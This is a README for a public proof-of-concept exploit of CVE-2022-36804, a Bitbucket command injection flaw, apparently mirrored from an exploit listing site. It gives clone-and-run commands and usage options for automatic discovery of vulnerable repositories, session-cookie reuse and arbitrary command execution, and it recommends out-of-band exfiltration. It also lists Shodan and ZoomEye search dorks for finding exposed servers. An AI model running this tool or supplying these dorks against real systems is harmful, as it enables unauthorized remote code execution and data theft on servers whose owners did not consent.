Share
## https://sploitus.com/exploit?id=33431FB9-2A29-5155-B353-2A1A8CDF6994
# CVE-2022-36804-PoC-Exploit
A somewhat reliable PoC exploit for CVE-2022-36804 (BitBucket Critical Command Injection). This attack generally requires public repos to be enabled, however session cookies are also compatible with this exploit. Note: this exploit includes automatic repo detection which is handy if you don't want to manually find open repos yourself.
## HowTo Install
```bash
git clone https://github.com/BenHays142/CVE-2022-36804-PoC-Exploit.git;
cd CVE-2022-36804-PoC-Exploit
python3 -m pip install -r requirements.txt
python3 main.py [target]
```
## HowTo Use
```
usage: main.py [-h] [--project PROJECT] [--repo REPO] [--skip-auto] [--session SESSION] [--command CMD] server

Exploit BitBucket Instances (< v8.3.1) using CVE-2022-36804. Exploits automagically without any extra parameters, but allows for custom settings as well.

positional arguments:
  server

options:
  -h, --help         show this help message and exit
  --project PROJECT  The name of the project the repository resides in
  --repo REPO        The name of the repository
  --skip-auto        Skip the automatic finding of exploitable repos
  --session SESSION  Value of 'BITBUCKETSESSIONID' cookie, useful if target repo is private
  --command CMD      Command to execute if exploit is successful (Note: getting output isn't reliable so OOB exfil is a must)

```
## Dorks (For legal purposes only)
#### Shodan:
```
http.favicon.hash:667017222 http.title:Public
```
#### Zoomeye:
```
iconHash:667017222 +title=Public
```
## References
[Atlassian Advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html)

[Atlassian Jira Issue](https://jira.atlassian.com/browse/BSERV-13438)

[NIST CVE](https://nvd.nist.gov/vuln/detail/CVE-2022-36804)